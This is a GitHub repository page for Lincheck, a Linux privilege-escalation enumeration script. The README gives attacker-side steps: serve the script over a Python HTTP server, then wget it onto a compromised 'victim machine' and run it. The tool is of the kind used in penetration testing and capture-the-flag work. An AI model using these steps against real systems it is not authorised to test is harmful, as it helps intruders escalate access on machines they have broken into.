Skip to content

This is a linux proivilledge escilation checker tool that checks for common linux priviledge escilation techniques.

Notifications You must be signed in to change notification settings

deltaRed1a/Lincheck

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

Lincheck

This is a linux privilege escalation checker tool that checks for common linux privilege escilation techniques.

Once you have get a initial foothold on a target machine than you can transfer this linux script on to the victim machine with python http server.

In Your Attacking Machine

git clone https://github.com/Vivek170952/Lincheck.git

cd Lincheck

python -m http.server 4444

In Your Victim Machine

wget http://YOUR-IP:4444/linprivcheck.sh

chmod +x linprivcheck.sh

./linprivcheck.sh

This tool will save your lots of time inenumeration of machine and gives result in a good format.

21.04.2023_10.03.08_REC.mp4

About

This is a linux proivilledge escilation checker tool that checks for common linux priviledge escilation techniques.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 100.0%